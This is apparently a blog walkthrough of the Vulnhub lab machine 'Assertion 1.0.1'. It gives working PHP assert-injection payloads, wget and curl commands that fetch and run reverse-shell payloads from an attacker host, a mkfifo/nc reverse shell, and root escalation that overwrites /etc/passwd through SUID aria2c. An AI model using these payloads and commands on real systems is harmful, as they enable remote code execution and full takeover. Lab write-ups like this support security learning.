Open in app

Sign in

Write

Sign in

Vulnhub: Assertion 1.0.1

H0j3n
4 min readJul 4, 2020

--

You won't know unless you try it

This box teach me new knowledge and I want to share with everyone who reads this :)

Enumeration

Let’s do nmap first and see what do we get.

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29

Port 80 (Http)

Port 80

Inside the website, we can see a lot of pages thus we can run our Gobuster to check any interesting files.

Gobuster Results

But there is nothing that we found interesting. So I further checking the page source and found the link to open any page looks like this. LFI!!!

http://<ip>/index.php?page=gallery

Local File Inclusion (LFI)

In this case, I always use Burpsuite and with my own custom wordlist that I created (check on references).

Burpsuite: Intruder

Add the payload marker like the above diagram and paste the payload. Start attack!

LFI Payloads

Okay, usually it works but now totally not working. Then I go search if there are any alternatives or another way to LFI. Then by using the keyword “assert” and “lfi” I found an interesting StackOverflow discussion.

StackOverFlow Discussions

It's working nicely! Use CyberChef to URL Encode.

' and die(show_source('/etc/passwd')) or '
Burpsuite: Repeater

First User (www-data)

I will show you 2 ways to get a reverse shell :

First (Msfvenom Payload)

#Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf#Wget into /tmp (Url Encoded)
' and die(system("wget 'http://<ip>/shell.elf' -O /tmp/shell.elf")) or '#Run while use multi/handler
' and die(system("/tmp/shell.elf")) or '

Second (Curl Php)

#Create a php reverse shell (shell.php)
<?php
    system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.142 9001 >/tmp/f');
?>#Curl and listen (Url Encoded)
' and die(system("curl http://<ip>/shell.php|php")) or '

We got our shell!

Reverse Shell

Root

Let's run linpeas and check if there are any interesting files that can be found.

Linpeas Result

We get a yellow color on the aria2c file !! So after checking on GTFOBins I found something related with the SUID but it seems not working at all :’)

GTFOBins SUID aria2c

But I can read /etc/shadow as root using this command

/usr/bin/aria2c -i <any file>

After a lot of searching. I found a way to overwrite a file as root. These are my steps and I hope everyone learns new knowledge from my writing :) You can view my previous writeup on how to escalate when /etc/passwd is writable.

#Copy /etc/passwd by read as a root
/usr/bin/aria2c -i /etc/passwd#Add user with root rigts in the file
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash#Upload it inside /etc (must be in /etc directory)
/usr/bin/aria2c -o passwd "http://<ip>/newpasswd" --allow-overwrite=true#Get the shell! (Pass : Password@973)
su Tom

Rooted! The previous box really helps me a lot this time haha. I would like to thanks to my friend @ch4rm if it's not for him I would not think this way xD

Root Shell

If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)

H0j3n

You can support my writing and I would love to write more contents :) You can check out my "Buy me a Coffee"

www.buymeacoffee.com

References

  1. https://github.com/H0j3n/Encounter_Wordlist/blob/master/lfi_etcpasswd.txt
  2. https://security.stackexchange.com/questions/146757/cannot-figure-out-how-to-bypass-this-function-for-lfi
  3. https://gchq.github.io/CyberChef/
  4. https://gtfobins.github.io/gtfobins/aria2c/
  5. https://aria2.github.io/manual/en/html/aria2c.html
Education
Writing
Social Media
Life
Self Improvement

--

--

H0j3n
H0j3n

Written by H0j3n

127 Followers
30 Following

CTF Player 🚩 || TRYHACKME || HACKTHEBOX || VULNHUB || STUDENT

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams